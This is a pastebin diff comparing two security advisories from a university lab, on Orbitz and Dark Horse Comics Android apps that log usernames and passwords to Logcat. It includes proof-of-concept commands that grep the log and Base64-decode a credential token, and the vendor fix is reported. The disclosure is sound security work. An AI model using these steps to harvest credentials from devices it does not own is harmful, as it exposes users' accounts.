SHOW:
|
|
- or go back to the newest paste.
| 1 | - | # Exploit Title: Orbitz Android App - Username/Password Logging |
| 1 | + | # Title: Dark Horse Comics - Logging Sensitive Information |
| 2 | - | # Application: Orbitz |
| 2 | + | # Application: Dark Horse Comics |
| 3 | - | # Version: 19.31.1 |
| 3 | + | # Version: 1.3.21 |
| 4 | - | # Software Link: https://play.google.com/store/apps/details?id=com.orbitz |
| 4 | + | # Software Link: https://play.google.com/store/apps/details?id=com.darkhorse.digital |
| 5 | - | # Company: Orbitz |
| 5 | + | # Company: Dark Horse Comics |
| 6 | # Installs: 1,000,000+ | |
| 7 | - | # Impact: Looking at the output of Logcat, hackers can get username and password of Orbitz |
| 7 | + | # Impact: hackers can get username and password of Dark Horse Comics, looking at the log. |
| 8 | # Category: Mobile Apps | |
| 9 | # Tested on: Android 9 | |
| 10 | ||
| 11 | ---Description--- | |
| 12 | - | Usernames and passwords are stored in the log during the authentication. So, hackers can obtain user password/ID of Orbitz, simply looking at Logcat. Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission. |
| 12 | + | Dark Horse Comics, the popular comics app installed more than 1 million, stores a user token in Logcat. The user token is the Base64-encoded string from password and username, so by decoding it, hackers can obtain usernames and passwords of the app. |
| 13 | Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission. | |
| 14 | ||
| 15 | ||
| 16 | ---Vendor feedback--- | |
| 17 | After reporting, the vendor has quickly fixed this problem and released a new version. | |
| 18 | - | 1. Try to login with Orbitz, entering username and password |
| 18 | + | |
| 19 | ---PoC--- | |
| 20 | - | 2. Search password in Logcat |
| 20 | + | 1. Try to log in Dark Horse Comics, Android app. |
| 21 | - | $ adb logcat | grep 'password' |
| 21 | + | - Opening Login UI |
| 22 | - | 08-06 18:31:28.036 6213 6294 D OkHttp : email=myOrbizemail%40gmail.com&password=myOrbitPassword&staySignedIn=true&siteid=70201&langid=1033&sourceType=mobileapp&clientid=orbitz.app.android.phone%3A19.31.1 |
| 22 | + | - Enter credentials. Fake information is enough for reproducing. |
| 23 | - | |
| 23 | + | |
| 24 | - | ---Reporter--- |
| 24 | + | 2. Search the token in the log |
| 25 | - | Jaeho Lee(Jaeho.Lee@rice.edu) |
| 25 | + | $ adb logcat | grep 'request with token' |
| 26 | ||
| 27 | 09-16 23:44:31.132 13303 14813 V DarkHorse.DungeonHTTPClient: Manually signing HTTP request with token: amFlaG8ubGVlQHJpY2UuZWR1Om15ZmFja3Bhc3N3b3Jk | |
| 28 | ||
| 29 | 3. Decoding base64 to get a username and password. | |
| 30 | $ base64 -d | |
| 31 | amFlaG8ubGVlQHJpY2UuZWR1Om15ZmFja3Bhc3N3b3Jk | |
| 32 | jaeho.lee@rice.edu:myfackpassword | |
| 33 | ||
| 34 | --Reporter--- | |
| 35 | Jaeho Lee (Jaeho.Lee@rice.edu) | |
| 36 | Rice Computer Security Lab | |
| 37 | Rice University |
